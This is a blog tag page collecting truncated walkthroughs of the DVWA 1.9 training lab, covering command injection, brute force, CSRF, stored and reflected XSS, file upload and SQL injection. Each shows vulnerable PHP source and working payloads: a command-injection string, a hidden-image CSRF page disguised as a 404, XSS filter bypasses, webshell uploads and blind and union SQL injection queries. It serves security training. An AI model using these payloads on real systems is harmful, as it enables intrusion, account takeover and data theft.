Tag: dvwa

Results for tag (dvwa):

DVWA 1.9: Command Injection

Low:

Source:

    <?php
    if( isset( $_POST[ 'Submit' ] ) ) {
        // Get input
        $target = $_REQUEST[ 'ip' ];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    ?>

The ip parameter is not filtered at all:

    127.0.0.1&&net user

Medium:

Source:

    <?php
    if( isset( $_POST[ 'Submit' ] ) ) {
        // Get input
        $target = $_REQUEST[ 'ip' ];

        // Set blacklist
        $substitutions = array(
            '&&' => '',
            ';'  => '',
        );

        // Remove any of the characters in the array (blacklist).
        $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping -c 4 ' . $target );
    ……

DVWA 1.9: Brute Force

Low:

Source:

    <?php
    if( isset( $_GET[ 'Login' ] ) ) {
        // Get username
        $user = $_GET[ 'username' ];

        // Get password
        $pass = $_GET[ 'password' ];
        $pass = md5( $pass );

        // Check the database
        $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
        $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

        if( $result && mysql_num_rows( $result ) == 1 ) {
            // Get users details
            $avatar = mysql_result( $result, 0, "avatar" );

            // Login successful
            echo "<p>Welcome to the password protected area {$user}</p>";
            echo "<img src=\"{$avatar}\" />";
        }
        else {
            // Login failed
            echo "<pre><br />Username and/or password incorrect.</pre>";
        }

        mysql_close();
    }
    ?>

There is no anti-brute-force mechanism at all, and there is a SQL injection vulnerability as well. Brute-force the password directly with Burp Suite.

Medium:

Source:

    <?php
    if( isset( $_GET[ 'Login' ] ) ) {
        // Sanitise username input
        $user = $_GET[ 'username' ];
        $user = mysql_real_escape_string( $user );

        // Sanitise password input
        $pass = $_GET[ 'password' ];
        $pass = mysql_real_escape_string( $pass );
        $pass = md5( $pass );

        // Check the database
        $query = "SELECT *……

DVWA 1.9: CSRF

Low:

Source:

    <?php
    if( isset( $_GET[ 'Change' ] ) ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = mysql_real_escape_string( $pass_new );
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }

        mysql_close();
    }
    ?>

There is no CSRF protection at all, so just construct a link and get someone to click it:

    www.website.com/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#

The password is changed successfully!

This link has two drawbacks:
1. It is too obvious…….
2. The "Password Changed" page appears.

Improvement: a short URL. The long URL above can be shortened to http://t.cn/RSmyVRE. The second drawback remains.

Further improvement: first host an attack page on a public server and lure the victim into visiting it, so the CSRF attack completes without the victim noticing.

HTML attack page:

    <img src="http://www.website.com/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>
    <h1>404</h1>
    <h2>file not found.</h2>

After the victim clicks, a 404 is displayed (500, 503 or 403 work too), but the password has already been changed.

Medium:

Source:

    <?php
    if( isset( $_GET[ 'Change' ] ) ) {
        // Checks to see where the request came from
        if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {
            // Get input
            $pass_new  = $_GET[ 'password_new' ];
            $pass_conf = $_GET[……

DVWA 1.9: XSS (stored)

Low:

Source:

    <?php
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] );
        $name    = trim( $_POST[ 'txtName' ] );

        // Sanitize message input
        $message = stripslashes( $message );
        $message = mysql_real_escape_string( $message );

        // Sanitize name input
        $name = mysql_real_escape_string( $name );

        // Update database
        $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
        $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

        //mysql_close();
    }
    ?>

There is no protection against XSS at all; <script>alert(/xss/)</script> works directly. The name field only has a front-end length limit, maxlength="10", which can be bypassed by intercepting the request and modifying it.

Medium:

Source:

    <?php
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] );
        $name    = trim( $_POST[ 'txtName' ] );

        // Sanitize message input
        $message = strip_tags( addslashes( $message ) );
        $message = mysql_real_escape_string( $message );
        $message = htmlspecialchars( $message );

        // Sanitize name input
        $name = str_replace( '<script>', '', $name );
        $name = mysql_real_escape_string( $name );

        // Update database
        $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";……

DVWA 1.9: XSS (reflected)

Low:

Source:

    <?php
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Feedback for end user
        echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
    }
    ?>

No protection at all; <script>alert(/xss/)</script> pops an alert directly.

Medium:

Source:

    <?php
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input
        $name = str_replace( '<script>', '', $_GET[ 'name' ] );

        // Feedback for end user
        echo "<pre>Hello ${name}</pre>";
    }
    ?>

str_replace strips the literal string <script>.
Method 1: case-variation bypass: <sCript>alert(/xss/)</scRipt>
Method 2: double-write bypass: <sc<script>ript>alert(/xss/)</script>

High:

Source:

    <?php
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input
        $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

        // Feedback for end user
        echo "<pre>Hello ${name}</pre>";
    }
    ?>

preg_replace filters "script" with a regex that also defeats case variation and double-writing, but it only filters "script", so a different trigger can be used instead (there are countless).
Payload: <img src=1 onerror=alert(/xss/)>

Impossible:

Source:

    <?php
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Check Anti-CSRF token
        checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

        // Get……

DVWA 1.9: File Upload

Low:

Key source:

    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";

For an upload vulnerability to be usable, the upload has to succeed, the script has to execute, and its path has to be obtainable. The low level has no protection whatsoever: upload a PHP one-line webshell directly to get a shell.

Medium:

Key source:

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

Auditing the source shows that the file size and type are restricted. A one-line webshell is well under 100000 bytes, and the type check can be bypassed by intercepting the request and modifying it.
Method 1: upload a conn.php one-line webshell, intercept and change the type to image/jpeg, connect with Caidao (China Chopper); tested successfully.
Method 2: upload a conn1.png one-line image webshell, intercept and rename it to conn1.php, connect with Caidao; tested successfully.
Method 3: use the medium-level file inclusion vulnerability to include the uploaded one-line image webshell, then connect with Caidao; not tested.
Method 4: null-byte truncation, constructing conn1.php%00.png; requires a server with a PHP version below 5.3.4 and magic_quotes_gpc off; not tested.

High:

Key source:

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];……

DVWA 1.9: SQL Injection (blind)

Low:

Key source:

    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

1. Detection:
Input: 1' and 1=1;#
Output: User ID exists in the database.
Input: 1' and 1=2;#
Output: User ID is MISSING from the database.
So this is a string-type injection.

2. Guessing the current database:
Determine the length of the database name:
Input: 1' and length(database())=1;#
Output: User ID is MISSING from the database.
Input:
Output: User ID exists in the database.
The database name is 16 characters long.
Guess the database name:
Input: 1' and ascii(substr(database(),1,1))>97;#
Output: User ID is MISSING from the database.
Input: 1' and ascii(substr(database(),1,1))<117;#
Output: User ID exists in the database.
Continue by binary search in this way until the whole database name is recovered.

3. Guessing the table names:
Input: 1' and (select count(table_name) from information_schema.tables where table_schema=database() )=2;#
Output: User ID exists in the database.
So the database has 2 tables.
Input: 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9;#
Output: User ID exists in the database.
So the first table name is 9 characters long.
Input: 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103;#
Output: User ID is MISSING from the database.
Input: 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103;#
Output: User ID is MISSING from the database.
So the first character of the first table name is g; the rest of the table name follows in the same way.

4. Guessing the column information
Input: 1' and (select……

DVWA 1.9: SQL Injection

Low:

Key source:

    $id = $_REQUEST[ 'id' ];

    // Check database
    $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

There is no filtering at all, and it is a string-type injection. Normally the source is not available, though, so the injection type has to be determined by testing.

(1) Determine the injection type
Try: 1 or 1=1;#
Returns:
    ID: 1 or 1=1;# First name: admin Surname: admin
Try: 1' or 1=1;#
Returns:
    ID: 1' or 1=1;# First name: admin Surname: admin
    ID: 1' or 1=1;# First name: Gordon Surname: Brown
    ID: 1' or 1=1;# First name: Hack Surname: Me
    ID: 1' or 1=1;# First name: Pablo Surname: Picasso
    ID: 1' or 1=1;# First name: Bob Surname: Smith
String-type injection.

(2) Determine the number of columns (fields)
Try: 1' order by 2;#
Returns:
    ID: 1' order by 2;# First name: admin Surname: admin
Try: 1' order by 3;#
Returns:
    Unknown column '3' in 'order clause'
2 columns.

(3) Find the display positions
Try: 1' union select 1,2;#
Returns:
    ID: 1' union select 1,2;# First name: admin Surname: admin
    ID: 1' union select 1,2;# First name: 1 Surname: 2
Use the display positions to query the database name and the current user:
Try: 1' union select database(),current_user();#
Returns:
    ID: 1' union select database(),current_user();# First name: admin Surname: admin
    ID: 1' union select database(),current_user();# First name: nhbgtfzt_othpene Surname: nhbgtfzt_lsa@localhost

(4) Query all tables
Since the MySQL version is above 5, information_schema can be used.
Try: 1'……